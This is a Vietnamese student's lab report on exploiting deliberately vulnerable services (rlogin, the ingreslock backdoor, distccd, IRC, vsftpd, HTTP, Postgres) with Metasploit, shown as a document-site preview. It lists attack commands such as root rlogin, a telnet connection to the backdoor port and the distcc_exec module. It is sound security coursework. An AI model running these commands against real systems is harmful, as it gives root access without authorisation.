Cơ sở an toàn thông tin báo cáo thực hành metasploit

11 4 0
Cơ sở an toàn thông tin báo cáo thực hành metasploit

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Tìm hiểu lý thuyếtTrong bài thực hành này, có một số khái niệm cơ bản về quy trình khai thác lỗ hổng trên các dịch vụ sử dụng Metasploit.. - Sử dụng công cụ nmap để quét các dịch vụ có t

Trang 1

BỘ THÔNG TIN VÀ TRUYỀN THÔNG

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

CƠ SỞ AN TOÀN THÔNG TINBáo cáo thực hành: Metasploit

Sinh viên: Doãn Hưng NguyênMã sinh viên: B21DCVT329

Lớp: E21CQCN03-B

Trang 2

Mục lục

I Tìm hiểu lý thuyết 3 II Mô tả các bước làm bài tập 3 III Kết luận 10

Trang 3

I Tìm hiểu lý thuyết

Trong bài thực hành này, có một số khái niệm cơ bản về quy trình khai thác lỗ hổng trên các dịch vụ sử dụng Metasploit

II Mô tả các bước làm bài tập - Khởi động bài lab

- Trên terminal attacker và victim sử dụng lệnh “ifconfig” để tìm địa chỉ IP.

- Sử dụng câu lệnh “ping” để kiểm tra kết nối từ máy attacker đến máy Victim

Trang 4

- Sử dụng công cụ nmap để quét các dịch vụ có thể tấn công

- Khai thác dịch vụ cấu hình rlogin: rlogin -l root 192.168.1.2

- Sau đó thực hiện mở file filetoview.txt :cat /root/filetoview.txt

Trang 5

- Khai thác dịch vụ ingreslock (cổng 1524): telnet 192.168.1.2 1524

- Sau đó thực hiện mở file filetoview.txt :cat /root/filetoview.txt

- Khai thác dịch vụ distccd trong trình điều khiển Metasploit

Trang 6

Tìm và tấn công dịch vụ distccd: search distccdSử dụng công cụ khai thác “exploit”: use exploit/unix/misc/distcc_exec

Đặt “RHOST” : set RHOST 192.168.1.2Thực hiện khai thác lỗ hổng: exploit

Trang 7

- Sau đó thực hiện mở file filetoview.txt: cat /root/filetoview.txt

- Tìm và khai thác dịch vụ IRC daemon trong trình điều khiển Metasploit

Trang 8

Thực hiện tương tự như dịch vụ distccd, ta có:

- Tìm và khai thác dịch vụ VSFtpd trong trình điểu khiển Metasploit Thực hiện tương tự như các dịch vụ trên, ta có:

Trang 9

Thực hiện tương tự như các dịch vụ trên, ta có:

- Tìm và khai thác dịch vụ HTTP trong trình điều khiển Metasploit

- Sau khi thực hiện exploit xong, 1 lời nhắc tên meterpreter xuất hiện, thực hiện thả shell

Trang 10

- Tìm và khai thác dịch vụ Postgres trong trình điểu khiển Metasploit Thực hiện tương tự như dịch vụ HTTP, ta có:

- Kiểm tra kết quả bằng checkwork:

Trang 11

III Kết luận

Sau khi tìm hiểu các khái niệm mạng cơ bản trong môi trường Linux, ta đã nắm được các kiến thức cơ bản về các dịch vụ cơ bản như rlogin, ingreslock, distccd, IRC daemon, VSFtpd, Samba, HTTP, Postgres Qua việc thực hiện cài đặt và chạy demo của mỗi loại công cụ, ta đã có cơ hội hiểu rõ hơn về cách chúng hoạt động và cách chúng có thể ảnh hưởng đến bảo mật hệ thống và quyền riêng tư, tuy nhiên cũng cần nhớ rằng việc sử dụng các công cụ này phải tuân thủ các quy định pháp luật và đạo đức, và chỉ được thực hiện với mục đích hợp pháp và đạo đức.

Ngày đăng: 29/03/2024, 04:14

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan